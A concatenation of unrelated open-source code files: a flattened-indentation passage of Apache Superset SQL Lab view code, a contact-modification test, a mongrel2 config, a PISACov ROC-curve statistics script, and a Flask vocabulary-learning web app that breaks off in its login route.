"The provided `rows` argument is not a valid integer."
),
error_type=SupersetErrorType.INVALID_PAYLOAD_SCHEMA_ERROR,
level=ErrorLevel.ERROR,
),
status=400,
) from ex
obj = apply_display_max_row_configuration_if_require(obj, rows)
return json_success(
json.dumps(
obj, default=utils.json_iso_dttm_ser, ignore_nan=True, encoding=None
)
)
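    # Illustrative sketch (assumption): fetching a bounded slice of cached
    # results for a known results key, using the optional `rows` argument
    # handled above.
    #
    #   session.get("https://superset.example.com/superset/results/<key>/?rows=100")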
@has_access_api
@handle_api_exception
@expose("/stop_query/", methods=["POST"])
@event_logger.log_this
@backoff.on_exception(
backoff.constant,
Exception,
interval=1,
on_backoff=lambda details: db.session.rollback(),
on_giveup=lambda details: db.session.rollback(),
max_tries=5,
)
def stop_query(self) -> FlaskResponse:
client_id = request.form.get("client_id")
query = db.session.query(Query).filter_by(client_id=client_id).one()
if query.status in [
QueryStatus.FAILED,
QueryStatus.SUCCESS,
QueryStatus.TIMED_OUT,
]:
logger.warning(
"Query with client_id could not be stopped: query already complete",
)
return self.json_response("OK")
if not sql_lab.cancel_query(query):
raise SupersetCancelQueryException("Could not cancel query")
query.status = QueryStatus.STOPPED
db.session.commit()
return self.json_response("OK")
@has_access_api
@event_logger.log_this
@expose("/validate_sql_json/", methods=["POST", "GET"])
def validate_sql_json(
# pylint: disable=too-many-locals
self,
) -> FlaskResponse:
"""Validates that arbitrary sql is acceptable for the given database.
Returns a list of error/warning annotations as json.
"""
logger.warning(
"%s.validate_sql_json "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
sql = request.form["sql"]
database_id = request.form["database_id"]
schema = request.form.get("schema") or None
template_params = json.loads(request.form.get("templateParams") or "{}")
if template_params is not None and len(template_params) > 0:
# TODO: factor the Database object out of template rendering
# or provide it as mydb so we can render template params
# without having to also persist a Query ORM object.
return json_error_response(
"SQL validation does not support template parameters", status=400
)
session = db.session()
mydb = session.query(Database).filter_by(id=database_id).one_or_none()
if not mydb:
return json_error_response(
"Database with id {} is missing.".format(database_id), status=400
)
spec = mydb.db_engine_spec
validators_by_engine = app.config["SQL_VALIDATORS_BY_ENGINE"]
if not validators_by_engine or spec.engine not in validators_by_engine:
return json_error_response(
"no SQL validator is configured for {}".format(spec.engine), status=400
)
validator_name = validators_by_engine[spec.engine]
validator = get_validator_by_name(validator_name)
if not validator:
return json_error_response(
"No validator named {} found (configured for the {} engine)".format(
validator_name, spec.engine
)
)
try:
timeout = config["SQLLAB_VALIDATION_TIMEOUT"]
timeout_msg = f"The query exceeded the {timeout} seconds timeout."
with utils.timeout(seconds=timeout, error_message=timeout_msg):
errors = validator.validate(sql, schema, mydb)
payload = json.dumps(
[err.to_dict() for err in errors],
default=utils.pessimistic_json_iso_dttm_ser,
ignore_nan=True,
encoding=None,
)
return json_success(payload)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
msg = _(
"%(validator)s was unable to check your query.\n"
"Please recheck your query.\n"
"Exception: %(ex)s",
validator=validator.name,
ex=ex,
)
# Return as a 400 if the database error message says we got a 4xx error
if re.search(r"([\W]|^)4\d{2}([\W]|$)", str(ex)):
return json_error_response(f"{msg}", status=400)
return json_error_response(f"{msg}")
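    # Illustrative sketch (assumption): validating a statement against
    # database 1; a validator must be registered for the engine in
    # SQL_VALIDATORS_BY_ENGINE, otherwise a 400 is returned as above.
    #
    #   session.post(
    #       "https://superset.example.com/superset/validate_sql_json/",
    #       data={"sql": "SELECT 1", "database_id": 1},
    #   )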
@has_access_api
@handle_api_exception
@event_logger.log_this
@expose("/sql_json/", methods=["POST"])
def sql_json(self) -> FlaskResponse:
try:
log_params = {
"user_agent": cast(Optional[str], request.headers.get("USER_AGENT"))
}
execution_context = SqlJsonExecutionContext(request.json)
command = self._create_sql_json_command(execution_context, log_params)
command_result: CommandResult = command.run()
return self._create_response_from_execution_context(command_result)
except SqlLabException as ex:
logger.error(ex.message)
self._set_http_status_into_Sql_lab_exception(ex)
payload = {"errors": [ex.to_dict()]}
return json_error_response(status=ex.status, payload=payload)
@staticmethod
def _create_sql_json_command(
execution_context: SqlJsonExecutionContext, log_params: Optional[Dict[str, Any]]
) -> ExecuteSqlCommand:
query_dao = QueryDAO()
sql_json_executor = Superset._create_sql_json_executor(
execution_context, query_dao
)
execution_context_convertor = ExecutionContextConvertor()
execution_context_convertor.set_max_row_in_display(
int(config.get("DISPLAY_MAX_ROW")) # type: ignore
)
return ExecuteSqlCommand(
execution_context,
query_dao,
DatabaseDAO(),
CanAccessQueryValidatorImpl(),
SqlQueryRenderImpl(get_template_processor),
sql_json_executor,
execution_context_convertor,
config.get("SQLLAB_CTAS_NO_LIMIT"), # type: ignore
log_params,
)
@staticmethod
def _create_sql_json_executor(
execution_context: SqlJsonExecutionContext, query_dao: QueryDAO
) -> SqlJsonExecutor:
sql_json_executor: SqlJsonExecutor
if execution_context.is_run_asynchronous():
sql_json_executor = ASynchronousSqlJsonExecutor(query_dao, get_sql_results)
else:
sql_json_executor = SynchronousSqlJsonExecutor(
query_dao,
get_sql_results,
config.get("SQLLAB_TIMEOUT"), # type: ignore
is_feature_enabled("SQLLAB_BACKEND_PERSISTENCE"),
)
return sql_json_executor
@staticmethod
def _set_http_status_into_Sql_lab_exception(ex: SqlLabException) -> None:
if isinstance(ex, QueryIsForbiddenToAccessException):
ex.status = 403
def _create_response_from_execution_context( # pylint: disable=invalid-name, no-self-use
self,
command_result: CommandResult,
) -> FlaskResponse:
status_code = 200
if command_result["status"] == SqlJsonExecutionStatus.QUERY_IS_RUNNING:
status_code = 202
return json_success(command_result["payload"], status_code)
@has_access
@event_logger.log_this
@expose("/csv/<client_id>")
def csv( # pylint: disable=no-self-use,too-many-locals
self, client_id: str
) -> FlaskResponse:
"""Download the query results as csv."""
logger.info("Exporting CSV file [%s]", client_id)
query = db.session.query(Query).filter_by(client_id=client_id).one()
try:
query.raise_for_access()
except SupersetSecurityException as ex:
flash(ex.error.message)
return redirect("/")
blob = None
if results_backend and query.results_key:
logger.info("Fetching CSV from results backend [%s]", query.results_key)
blob = results_backend.get(query.results_key)
if blob:
logger.info("Decompressing")
payload = utils.zlib_decompress(
blob, decode=not results_backend_use_msgpack
)
obj = _deserialize_results_payload(
payload, query, cast(bool, results_backend_use_msgpack)
)
columns = [c["name"] for c in obj["columns"]]
df = pd.DataFrame.from_records(obj["data"], columns=columns)
logger.info("Using pandas to convert to CSV")
else:
logger.info("Running a query to turn into CSV")
if query.select_sql:
sql = query.select_sql
limit = None
else:
sql = query.executed_sql
limit = ParsedQuery(sql).limit
if limit is not None and query.limiting_factor in {
LimitingFactor.QUERY,
LimitingFactor.DROPDOWN,
LimitingFactor.QUERY_AND_DROPDOWN,
}:
# remove extra row from `increased_limit`
limit -= 1
df = query.database.get_df(sql, query.schema)[:limit]
csv_data = csv.df_to_escaped_csv(df, index=False, **config["CSV_EXPORT"])
quoted_csv_name = parse.quote(query.name)
response = CsvResponse(
csv_data, headers=generate_download_headers("csv", quoted_csv_name)
)
event_info = {
"event_type": "data_export",
"client_id": client_id,
"row_count": len(df.index),
"database": query.database.name,
"schema": query.schema,
"sql": query.sql,
"exported_format": "csv",
}
event_rep = repr(event_info)
logger.debug(
"CSV exported: %s", event_rep, extra={"superset_event": event_info}
)
return response
@api
@handle_api_exception
@has_access
@event_logger.log_this
@expose("/fetch_datasource_metadata")
def fetch_datasource_metadata(self) -> FlaskResponse: # pylint: disable=no-self-use
"""
Fetch the datasource metadata.
:returns: The Flask response
:raises SupersetSecurityException: If the user cannot access the resource
"""
datasource_id, datasource_type = request.args["datasourceKey"].split("__")
datasource = DatasourceDAO.get_datasource(
db.session, DatasourceType(datasource_type), int(datasource_id)
)
# Check if datasource exists
if not datasource:
return json_error_response(DATASOURCE_MISSING_ERR)
datasource.raise_for_access()
return json_success(json.dumps(sanitize_datasource_data(datasource.data)))
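    # Illustrative sketch (assumption): `datasourceKey` is "<id>__<type>",
    # matching the split("__") above, with a hypothetical datasource id.
    #
    #   session.get(
    #       "https://superset.example.com/superset/fetch_datasource_metadata",
    #       params={"datasourceKey": "12__table"},
    #   )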
@has_access_api
@event_logger.log_this
@expose("/queries/<float:last_updated_ms>")
@expose("/queries/<int:last_updated_ms>")
def queries(self, last_updated_ms: Union[float, int]) -> FlaskResponse:
"""
Get the updated queries.
:param last_updated_ms: Unix time (milliseconds)
"""
return self.queries_exec(last_updated_ms)
@staticmethod
def queries_exec(last_updated_ms: Union[float, int]) -> FlaskResponse:
stats_logger.incr("queries")
if not g.user.get_id():
return json_error_response(
"Please login to access the queries.", status=403
)
# UTC date time, same that is stored in the DB.
last_updated_dt = datetime.utcfromtimestamp(last_updated_ms / 1000)
sql_queries = (
db.session.query(Query)
.filter(
Query.user_id == g.user.get_id(), Query.changed_on >= last_updated_dt
)
.all()
)
dict_queries = {q.client_id: q.to_dict() for q in sql_queries}
return json_success(json.dumps(dict_queries, default=utils.json_int_dttm_ser))
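    # Illustrative sketch (assumption): polling for queries changed during the
    # last minute; the path parameter is a Unix timestamp in milliseconds, as
    # converted by utcfromtimestamp(last_updated_ms / 1000) above.
    #
    #   since_ms = int(time.time() * 1000) - 60 * 1000
    #   session.get(f"https://superset.example.com/superset/queries/{since_ms}")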
@has_access
@event_logger.log_this
@expose("/search_queries")
def search_queries(self) -> FlaskResponse: # pylint: disable=no-self-use
"""
Search for previously run sqllab queries. Used for Sqllab Query Search
page /superset/sqllab#search.
Custom permission can_only_search_queries_owned restricts queries
to only queries run by current user.
:returns: Response with list of sql query dicts
"""
if security_manager.can_access_all_queries():
search_user_id = request.args.get("user_id")
elif request.args.get("user_id") is not None:
try:
search_user_id = int(cast(int, request.args.get("user_id")))
except ValueError:
return Response(status=400, mimetype="application/json")
if search_user_id != g.user.get_user_id():
return Response(status=403, mimetype="application/json")
else:
search_user_id = g.user.get_user_id()
database_id = request.args.get("database_id")
search_text = request.args.get("search_text")
status = request.args.get("status")
# From and To time stamp should be Epoch timestamp in seconds
from_time = request.args.get("from")
to_time = request.args.get("to")
query = db.session.query(Query)
if search_user_id:
# Filter on user_id
query = query.filter(Query.user_id == search_user_id)
if database_id:
# Filter on db Id
query = query.filter(Query.database_id == database_id)
if status:
# Filter on status
query = query.filter(Query.status == status)
if search_text:
# Filter on search text
query = query.filter(Query.sql.like(f"%{search_text}%"))
if from_time:
query = query.filter(Query.start_time > int(from_time))
if to_time:
query = query.filter(Query.start_time < int(to_time))
query_limit = config["QUERY_SEARCH_LIMIT"]
sql_queries = query.order_by(Query.start_time.asc()).limit(query_limit).all()
dict_queries = [q.to_dict() for q in sql_queries]
return Response(
json.dumps(dict_queries, default=utils.json_int_dttm_ser),
status=200,
mimetype="application/json",
)
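    # Illustrative sketch (assumption): all filters are optional query
    # arguments; `from`/`to` are epoch timestamps in seconds as noted above.
    #
    #   session.get(
    #       "https://superset.example.com/superset/search_queries",
    #       params={"status": "success", "search_text": "orders", "from": 1650000000},
    #   )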
@app.errorhandler(500)
def show_traceback(self) -> FlaskResponse: # pylint: disable=no-self-use
return (
render_template("superset/traceback.html", error_msg=get_error_msg()),
500,
)
@event_logger.log_this
@expose("/welcome/")
def welcome(self) -> FlaskResponse:
"""Personalized welcome page"""
if not g.user or not g.user.get_id():
if conf["PUBLIC_ROLE_LIKE"]:
return self.render_template("superset/public_welcome.html")
return redirect(appbuilder.get_url_for_login)
welcome_dashboard_id = (
db.session.query(UserAttribute.welcome_dashboard_id)
.filter_by(user_id=g.user.get_id())
.scalar()
)
if welcome_dashboard_id:
return self.dashboard(dashboard_id_or_slug=str(welcome_dashboard_id))
payload = {
"user": bootstrap_user_data(g.user, include_perms=True),
"common": common_bootstrap_payload(),
}
return self.render_template(
"superset/spa.html",
entry="spa",
bootstrap_data=json.dumps(
payload, default=utils.pessimistic_json_iso_dttm_ser
),
)
@has_access
@event_logger.log_this
@expose("/profile/<username>/")
def profile(self, username: str) -> FlaskResponse:
"""User profile page"""
user = (
db.session.query(ab_models.User).filter_by(username=username).one_or_none()
)
if not user:
abort(404, description=f"User: {username} does not exist.")
payload = {
"user": bootstrap_user_data(user, include_perms=True),
"common": common_bootstrap_payload(),
}
return self.render_template(
"superset/basic.html",
title=_("%(user)s's profile", user=username).__str__(),
entry="profile",
bootstrap_data=json.dumps(
payload, default=utils.pessimistic_json_iso_dttm_ser
),
)
@staticmethod
def _get_sqllab_tabs(user_id: int) -> Dict[str, Any]:
# send list of tab state ids
tabs_state = (
db.session.query(TabState.id, TabState.label)
.filter_by(user_id=user_id)
.all()
)
tab_state_ids = [str(tab_state[0]) for tab_state in tabs_state]
# return first active tab, or fallback to another one if no tab is active
active_tab = (
db.session.query(TabState)
.filter_by(user_id=user_id)
.order_by(TabState.active.desc())
.first()
)
databases: Dict[int, Any] = {}
for database in DatabaseDAO.find_all():
databases[database.id] = {
k: v for k, v in database.to_json().items() if k in DATABASE_KEYS
}
databases[database.id]["backend"] = database.backend
queries: Dict[str, Any] = {}
# These are unnecessary if sqllab backend persistence is disabled
if is_feature_enabled("SQLLAB_BACKEND_PERSISTENCE"):
# return all user queries associated with existing SQL editors
user_queries = (
db.session.query(Query)
.filter_by(user_id=user_id)
.filter(Query.sql_editor_id.in_(tab_state_ids))
.all()
)
queries = {
query.client_id: dict(query.to_dict().items()) for query in user_queries
}
return {
"tab_state_ids": tabs_state,
"active_tab": active_tab.to_dict() if active_tab else None,
"databases": databases,
"queries": queries,
}
@has_access
@event_logger.log_this
@expose("/sqllab/", methods=["GET", "POST"])
def sqllab(self) -> FlaskResponse:
"""SQL Editor"""
payload = {
"defaultDbId": config["SQLLAB_DEFAULT_DBID"],
"common": common_bootstrap_payload(),
**self._get_sqllab_tabs(g.user.get_id()),
}
form_data = request.form.get("form_data")
if form_data:
try:
payload["requested_query"] = json.loads(form_data)
except json.JSONDecodeError:
pass
payload["user"] = bootstrap_user_data(g.user, include_perms=True)
bootstrap_data = json.dumps(
payload, default=utils.pessimistic_json_iso_dttm_ser
)
return self.render_template(
"superset/basic.html", entry="sqllab", bootstrap_data=bootstrap_data
)
@has_access
@event_logger.log_this
@expose("/sqllab/history/", methods=["GET"])
def sqllab_history(self) -> FlaskResponse:
return super().render_app_template()
@api
@has_access_api
@event_logger.log_this
@expose("/schemas_access_for_file_upload")
def schemas_access_for_file_upload(self) -> FlaskResponse:
"""
This method exposes an API endpoint to
get the schema access control settings for file upload in this database
"""
if not request.args.get("db_id"):
return json_error_response("No database is allowed for your file upload")
db_id = int(request.args["db_id"])
database = db.session.query(Database).filter_by(id=db_id).one()
try:
schemas_allowed = database.get_schema_access_for_file_upload()
if security_manager.can_access_database(database):
return self.json_response(schemas_allowed)
# the list schemas_allowed should not be empty here
# and the list schemas_allowed_processed returned from security_manager
# should not be empty either,
# otherwise the database should have been filtered out
# in CsvToDatabaseForm
schemas_allowed_processed = security_manager.get_schemas_accessible_by_user(
database, schemas_allowed, False
)
return self.json_response(schemas_allowed_processed)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
return json_error_response(
"Failed to fetch schemas allowed for csv upload in this database! "
"Please contact your Superset Admin!"
)
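    # Illustrative sketch (assumption): asking which schemas the current user
    # may upload CSV files into for database 1.
    #
    #   session.get(
    #       "https://superset.example.com/superset/schemas_access_for_file_upload",
    #       params={"db_id": 1},
    #   )
    #   # -> e.g. ["public", "staging"], depending on configured permissions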
|
the-stack_106_22047
|
from model.contact import Contact
from random import randrange
#def test_modify_first_contact_firstname(app):
# if app.contact.contact_count() == 0:
#        app.contact.create_contact(Contact(firstname="contact for modification"))
# old_contacts_list = app.contact.get_contact_list()
# contact = Contact(firstname="NewName1")
# contact.id = old_contacts_list[0].id
# app.contact.modify_first_contact(contact)
#    assert len(old_contacts_list) == app.contact.contact_count(), "Contact list length differs after modification"
# new_contact_list = app.contact.get_contact_list()
# old_contacts_list[0] = contact
# assert sorted(old_contacts_list, key=Contact.id_or_max) == sorted(new_contact_list, key=Contact.id_or_max)
def test_modify_some_contact_firstname(app, db, check_ui):
if len(db.get_db_contact_list()) == 0:
        app.contact.create_contact(Contact(firstname="contact for modification"))
old_contacts_list = db.get_db_contact_list()
index = randrange(len(old_contacts_list))
contact = Contact(firstname="NewName1")
contact.id = old_contacts_list[index].id
app.contact.modify_some_contact_by_id(contact.id, contact)
    assert len(old_contacts_list) == app.contact.contact_count(), "Contact list length differs after modification"
new_contact_list = db.get_db_contact_list()
old_contacts_list[index] = contact
assert sorted(old_contacts_list, key=Contact.id_or_max) == sorted(new_contact_list, key=Contact.id_or_max)
if check_ui:
assert sorted(new_contact_list, key=Contact.id_or_max) == sorted(app.group.get_contact_list(),
key=Contact.id_or_max)
|
the-stack_106_22051
|
from mongrel2.config import *
main = Server(
uuid="f400bf85-4538-4f7a-8908-67e313d515c2",
access_log="/logs/access.log",
error_log="/logs/error.log",
chroot="./",
default_host="localhost",
name="test",
pid_file="/run/mongrel2.pid",
port=6767,
hosts = [
Host(name="localhost", routes={
r'/tests/': Dir(base='tests/', index_file='index.html',
default_ctype='text/plain')
})
]
)
commit([main])
|
the-stack_106_22052
|
"""
This is PISACov, a program designed to infer quaternary structure
of proteins from evolutionary covariance.
"""
from pisacov import __prog__, __description__, __version__
from pisacov import __author__, __date__, __copyright__
__script__ = 'PISACov Statistical Analysis script'
from pisacov import command_line as pcl
from pisacov.iomod import paths as ppaths
import argparse
import datetime
import os
import csv
logger = None
def create_argument_parser():
"""Create a parser for the command line arguments used in pisacov_stats."""
parser = argparse.ArgumentParser(prog=__prog__, formatter_class=argparse.RawDescriptionHelpFormatter,
description=__description__+' ('+__prog__+') v.'+__version__ + os.linesep + __doc__,
epilog="Check pisacov.rtfd.io for more information.")
subparsers = parser.add_subparsers(help='sub-command help')
parser_rocs = subparsers.add_parser('rocs', help='Produce Receiver operating characteristic (ROC) curves for the data provided.')
parser_rocs.add_argument('scores', nargs=1, metavar=("ScoresCSVFile"),
help="Input scores CSV filepath.")
parser_rocs.add_argument("-f", "--full_score_analysis", action='store_true',
default=False,
help="Produce full analysis of beta score list (beta score list required).")
parser.add_argument("-o", "--outdir", nargs=1, metavar="Output_Directory",
help="Set output directory path. If not supplied, default is the one containing the input data.")
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
return parser
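# Illustrative command-line sketch (assumption, not part of the original file):
# the parser above defines a "rocs" sub-command that takes a scores CSV plus
# the global -o/--outdir option, so a typical invocation would look like
#
#   <pisacov-stats-entry-point> rocs scores.csv -o results/
#
# where the entry point name, "scores.csv" and "results/" are hypothetical.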
def main():
parser = create_argument_parser()
args = parser.parse_args()
global logger
logger = pcl.pisacov_logger(level="info")
welcomemsg, starttime = pcl.welcome(command=__script__)
logger.info(welcomemsg)
csvfile = ppaths.check_path(args.scores[0], 'file')
outdir = ppaths.check_path(args.outdir)
ppaths.mdir(outdir)
# Parsing scores
scores = {}
names = None
thraw = {}
with open(csvfile, 'r') as fin:
scoresin = csv.reader(fin)
for entry in scoresin:
if entry[0][0] != "#":
if (names is None or isinstance(names, str) or
(isinstance(names, list) and
len(names) != len(entry))):
names = []
for n in range(len(entry)):
names.append('sc_'+str(n+1))
else:
if thraw == {}:
for name in names[13:-1]:
thraw[name] = []
if entry[0] not in scores:
scores[entry[0]] = {}
if entry[1] not in scores[entry[0]]:
scores[entry[0]][entry[1]] = []
                        for sc in entry[13:-1]:
                            scores[entry[0]][entry[1]].append(float(sc))
                        if entry[-1].strip() in ('True', '1'):
                            scores[entry[0]][entry[1]].append(True)
                        elif entry[-1].strip() in ('False', '0'):
                            scores[entry[0]][entry[1]].append(False)
                        for n, name in enumerate(names[13:-1]):
                            thraw[name].append(scores[entry[0]][entry[1]][n])
else:
                        if [float(sc) for sc in entry[13:-1]] == scores[entry[0]][entry[1]][:-1]:
pass
else:
raise ValueError('CSV file contains different values for same interface.')
else:
                names = [n.strip() for n in entry]
                names[0] = names[0].lstrip('#').strip()
# Setting thresholds
thr = {}
FPR = {}
TPR = {}
for key, value in thraw.items():
        thr[key] = sorted(set(value))
FPR[key] = []
TPR[key] = []
for t in thr[key]:
FP = 0
TP = 0
FN = 0
TN = 0
for pdbid in scores:
for iface in scores[pdbid]:
stable = scores[pdbid][iface][-1]
                    # compare only the column that corresponds to this score
                    n = names[13:-1].index(key)
                    if scores[pdbid][iface][n] < t:
                        if stable is True:
                            FN += 1
                        else:
                            TN += 1
                    else:
                        if stable is True:
                            TP += 1
                        else:
                            FP += 1
FPR[key].append(FP/(FP+TN))
TPR[key].append(TP/(TP+FN))
fnameout = os.path.join(outdir, (key +
os.path.splitext(os.path.basename(csvfile))[0] +
'roc.dat'))
with open(fnameout, 'w') as fout:
for n in range(len(FPR[key])):
                fout.write(str(FPR[key][n]) + ' ' + str(TPR[key][n]) + '\n')
endmsg = pcl.ok(starttime, command=__script__)
logger.info(endmsg)
return
if __name__ == "__main__":
import sys
import traceback
try:
main()
logger.info(pcl.ok())
sys.exit(0)
except Exception as e:
if not isinstance(e, SystemExit):
msg = "".join(traceback.format_exception(*sys.exc_info()))
logger.critical(msg)
sys.exit(1)
|
the-stack_106_22055
|
from flask import Flask
from flask import render_template
from flask import redirect
from flask import request
from flask import url_for
from flask import flash
from flask import jsonify
from flask import session as login_session
from flask import abort
from flask import make_response
from flask_wtf.csrf import CSRFProtect
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.exc import NoResultFound
from database_setup import Base, User, Language, Word
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import random
import string
import httplib2
import json
import requests
app = Flask(__name__)
engine = create_engine('postgresql+psycopg2://vagrant:wlapaella@localhost:5432/morewords')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
csrf = CSRFProtect(app)
@app.route('/')
@app.route('/vocabulary/', methods=['GET'])
def vocabulary():
"""Return the main page with all languages and latest words."""
languages = session.query(Language).order_by('name').all()
latest_words = session.query(Word).order_by('id desc').limit(10)
is_user_logged_in = True if 'username' in login_session else False
context = {'languages': languages,
'latest_words': latest_words,
'is_user_logged_in': is_user_logged_in}
return render_template('vocabulary.html', **context)
@app.route('/vocabulary/languages', methods=['GET'])
def language_list():
"""Return the page to manage all languages."""
languages = session.query(Language).order_by('name').all()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in:
user = session.query(User).filter_by(id=login_session['user_id']).one()
else:
user = None
context = {'languages': languages,
'is_user_logged_in': is_user_logged_in,
'user': user}
return render_template('language_list.html', **context)
@app.route('/vocabulary/language/add/', methods=['GET', 'POST'])
def language_add():
"""Return the page to add a language."""
is_user_logged_in = True if 'username' in login_session else False
context = {'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_logged_in:
flash('You have to log in to add a language.')
return render_template('language_add.html', **context)
new_language = Language(name=request.form['name'].lower(),
user_id=login_session['user_id'])
session.add(new_language)
session.commit()
flash("New Language Created!")
return redirect(url_for('vocabulary'))
else:
if not is_user_logged_in:
flash('You have to log in to add a language.')
return render_template('language_add.html', **context)
@app.route('/vocabulary/<int:language_id>/edit/', methods=['GET', 'POST'])
def language_edit(language_id):
"""Return the page to edit the given language."""
to_edit = session.query(Language).filter_by(id=language_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_edit.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
no_permission_msg = ('Sorry, you don\'t have permission '
'to edit this language.')
context = {'to_edit': to_edit,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(no_permission_msg)
return render_template('language_edit.html', **context)
to_edit.name = request.form['name'].lower()
session.add(to_edit)
session.commit()
flash("Language Saved!")
return redirect(url_for('vocabulary'))
else:
if not is_user_authorized:
flash(no_permission_msg)
return render_template('language_edit.html', **context)
@app.route('/vocabulary/<int:language_id>/delete/', methods=['GET', 'POST'])
def language_delete(language_id):
"""Return the page to delete the given language."""
to_delete = session.query(Language).filter_by(id=language_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_delete.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
message = 'Sorry, you don\'t have permission to delete this language.'
context = {'to_delete': to_delete,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(message)
return render_template('language_delete.html', **context)
words = session.query(Word).filter_by(language_id=language_id).count()
if words > 0:
flash('Sorry, there are words saved in this language, '
'you can\'t delete it.')
return redirect(url_for('vocabulary'))
session.delete(to_delete)
session.commit()
flash("Language Deleted!")
return redirect(url_for('vocabulary'))
else:
if not is_user_authorized:
flash(message)
return render_template('language_delete.html', **context)
@app.route('/vocabulary/<int:language_id>/words/', methods=['GET'])
def word_list(language_id):
"""Return the page with all words in the given language."""
language = session.query(Language).filter_by(id=language_id).one()
words = (session.query(Word).filter_by(language_id=language_id).
order_by('name').all())
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in:
user = session.query(User).filter_by(id=login_session['user_id']).one()
else:
user = None
context = {'language': language,
'words': words,
'is_user_logged_in': is_user_logged_in,
'user': user}
return render_template('word_list.html', **context)
@app.route('/vocabulary/<int:language_id>/<int:word_id>/', methods=['GET'])
def word_detail(language_id, word_id):
"""Return the detail page of the given word."""
word = session.query(Word).filter_by(id=word_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in:
user = session.query(User).filter_by(id=login_session['user_id']).one()
else:
user = None
context = {'word': word,
'is_user_logged_in': is_user_logged_in,
'user': user}
return render_template('word_detail.html', **context)
@app.route('/vocabulary/word/add/', methods=['GET', 'POST'])
def word_add(language_id=None):
"""Return the page to add a word."""
languages = session.query(Language).all()
is_user_logged_in = True if 'username' in login_session else False
if len(languages) == 0:
flash('You should add a language first.')
return redirect(url_for('vocabulary'))
if request.method == 'POST':
language_id = request.form['language']
language = session.query(Language).filter_by(id=language_id).one()
new_word = Word(name=request.form['name'].lower(),
translation=request.form['translation'],
notes=request.form['notes'],
language=language,
user_id=login_session['user_id'])
session.add(new_word)
session.commit()
flash("New Word Created!")
return redirect(url_for('word_list', language_id=language.id))
else:
context = {'languages': languages,
'is_user_logged_in': is_user_logged_in}
return render_template('word_add.html', **context)
@app.route('/vocabulary/<int:language_id>/<int:word_id>/edit/',
methods=['GET', 'POST'])
def word_edit(language_id, word_id):
"""Return the page to edit the given word."""
languages = session.query(Language).all()
language = session.query(Language).filter_by(id=language_id).one()
to_edit = session.query(Word).filter_by(id=word_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_edit.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
no_permission_msg = 'Sorry, you don\'t have permission to edit this word.'
context = {'languages': languages,
'language': language,
'to_edit': to_edit,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_edit.html', **context)
to_edit.name = request.form['name'].lower()
to_edit.translation = request.form['translation']
to_edit.notes = request.form['notes']
if request.form.get('is_learned'):
to_edit.is_learned = True
else:
to_edit.is_learned = False
session.add(to_edit)
session.commit()
flash("Word Saved!")
context = {'language_id': language.id,
'word_id': to_edit.id}
return redirect(url_for('word_detail', **context))
else:
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_edit.html', **context)
@app.route('/vocabulary/<int:language_id>/<int:word_id>/delete/',
methods=['GET', 'POST'])
def word_delete(language_id, word_id):
"""Return the page to delete the given word."""
language = session.query(Language).filter_by(id=language_id).one()
to_delete = session.query(Word).filter_by(id=word_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_delete.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
no_permission_msg = ('Sorry, you don\'t have permission '
'to delete this word.')
context = {'to_delete': to_delete,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_delete.html', **context)
session.delete(to_delete)
session.commit()
flash("Word Deleted!")
return redirect(url_for('word_list', language_id=language_id))
else:
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_delete.html', **context)
# List of user words to learn
@app.route('/vocabulary/<int:language_id>/<int:user_id>/review',
methods=['GET'])
def personal_review(user_id, language_id):
"""Return a page with all words with is_learned==False."""
language = session.query(Language).filter_by(id=language_id).one()
words = session.query(Word).filter_by(language_id=language_id,
user_id=user_id,
is_learned=False)
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
context = {'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in,
'language': language,
'words': words}
if not is_user_authorized:
flash('Sorry, you don\'t have permission to see this page.')
return render_template('personal_review.html', **context)
# SIGNUP, LOGIN AND LOGOUT
@app.route('/signup', methods=['GET', 'POST'])
def signup():
"""Return the page to sign up without using Google or Facebook."""
is_user_logged_in = True if 'username' in login_session else False
context = {'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
new_user = User(username=request.form['username'],
email=request.form['email'],
picture=None)
new_user.hash_password(request.form['password'])
session.add(new_user)
session.commit()
languages = session.query(Language).order_by('name').all()
latest_words = session.query(Word).order_by('id desc').limit(10)
context = {'languages': languages,
'latest_words': latest_words,
'is_user_logged_in': is_user_logged_in}
flash('Hi %s, you have successfully registered.' % new_user.username)
flash('Log in to use morewords.')
return render_template('vocabulary.html', **context)
return render_template('signup.html', **context)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Return the page with all login options."""
is_user_logged_in = True if 'username' in login_session else False
state = ''.join(random.choice(string.ascii_uppercase + string.digits)
